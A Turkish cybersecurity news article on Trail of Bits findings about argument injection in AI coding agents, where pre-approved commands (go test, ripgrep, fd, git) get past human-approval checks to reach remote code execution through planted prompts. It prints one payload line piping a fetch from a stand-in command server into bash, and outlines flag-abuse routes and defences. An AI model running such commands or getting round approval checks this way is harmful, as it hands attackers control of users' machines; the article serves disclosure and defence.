İsimsiz üç popüler AI aracı platformundaki kritik bir argüman ekleme kusuru, saldırganların insan onayı korumalarını atlamasına ve görünüşte zararsız istemler yoluyla uzaktan kod yürütmeye (RCE) erişmesine olanak tanıyor.
Trail of Bits’e göre bu güvenlik açıkları, dosya arama ve kod analizi gibi görevlerde verimlilik sağlamak için tasarlanmış önceden onaylanmış sistem komutlarından yararlanıyor ve ajansal yapay zeka sistemlerinde yaygın bir tasarım kusurunun altını çiziyor.
Yapay zeka aracıları, işlevselliği yeniden keşfetmeden dosya sistemi işlemlerini ve sürüm kontrolünü yönetmek için find, grep, git ve go test gibi yerel araçlara güvenerek performans, güvenilirlik ve geliştirme hızı açısından avantajlar sunar.
Ancak bu önceden onaylanmış komutlar, kullanıcı girdileri argümanları etkilediğinde bir saldırı yüzeyi oluşturur ve CWE-88 tarafından tanımlandığı gibi argüman eklemeye izin verir.
Sistemler genellikle komutları izin verilenler listelerine göre doğrular ancak bağımsız değişken bayraklarını ihmal eder, bu da yardımcı programların geniş parametre alanları nedeniyle genel engellemeyi kullanışsız hale getirir.
Örneğin, basitleştirilmiş bir Go işlevi, “grep” gibi bir komutun güvenli olup olmadığını kontrol eder, ancak kullanıcı tarafından sağlanan argümanları işaretlenmemiş olarak ekleyerek istismara yer bırakır.
Bu anti-örüntü devam ediyor çünkü seçici filtreleme, komut seçenekleri hakkında kapsamlı bilgi gerektiriyor ve bu, yapay zekanın dinamik doğasıyla daha da güçlenen bir zorluk.
Saldırganlar, CLI tabanlı bir aracıda “go test -exec ‘bash -c” curl c2-server.evil.com?unittest= | bash; echo Success”’”, yetkisiz curl ve bash komutlarını tanıtmak için -exec bayrağını kullanıyor ve RCE’nin onaysız olmasına neden oluyor.
Başka bir örnek, Trail of Bits’e göre, JSON biçimli istemler aracılığıyla bir dosya oluşturmak için onaltılık kodlanmış verilerle git show’u kullanarak ve ardından bunu yürütmek için ripgrep’in –pre bayrağını kullanarak regex filtrelerini atladı.
Saldırı Kalıpları
Üçüncü bir sistemdeki bir cephe modeli güvenlik açığı, bir fd komutuna “-x=python3” gibi kötü amaçlı işaretler ekleyerek, rastgele eylemler için os.system ile önceden oluşturulmuş bir Python yükünü çalıştırdı.
Kod yorumlarına veya depolara yerleştirilebilen bu tek seferlik saldırılar, GTFOBins ve LOLBAS projelerinde kataloglanan “toprakta yaşama” tekniklerinden yararlanıyor.
Johann Rehberger’in Amazon Q komut ekleme hakkındaki Ağustos 2025 yazıları ve Claude Code’daki CVE-2025-54795 gibi CVE’ler de dahil olmak üzere daha önce yapılan açıklamalar bu riskleri yansıtıyor.
Bu tehditlere karşı koymak için araştırmacılar, aracı erişimini sınırlamak için kapsayıcılar, WebAssembly veya macOS’ta Emniyet Kemeri gibi işletim sistemi düzeyinde izolasyon kullanarak korumalı alan oluşturmayı birincil savunma olarak savunuyorlar.
Cephe kalıpları için, kullanıcı girişlerinden önce her zaman “–” gibi bağımsız değişken ayırıcıları ekleyin ve subprocess.run(shell=False) gibi yöntemlerle kabuk yürütmeyi devre dışı bırakın.
Find gibi araçlar bayraklar aracılığıyla kod yürütmeyi etkinleştirdiğinden ve LOLBAS kaynaklarına yönelik denetimleri teşvik ettiğinden, güvenli komut izin verilenler listeleri korumalı alanlar olmadan kusurlu olmaya devam ediyor.
Geliştiriciler günlük kaydı uygulamalı, izin verilenler listelerini azaltmalı ve şüpheli zincirler için insan döngülerini yeniden devreye sokmalıdır; kullanıcılar erişimi kısıtlamalı ve güvenilmeyen girişler için kapsayıcılar kullanmalıdır.
Güvenlik mühendisleri, istemler veya belgeler, belirsiz işaretler aracılığıyla araçları eşleyebilir ve istismar veritabanlarıyla karşılaştırabilir. Fail yapay zeka çoğaldıkça, bu koordineli açıklamalar, sağlamlaştırmadan önce güvenliğe öncelik verme yönünde bir değişimin sinyalini veriyor.
Günlük siber güvenlik güncellemeleri için bizi Google Haberler, LinkedIn ve X’te takip edin. Hikayelerinizi öne çıkarmak için bizimle iletişime geçin.
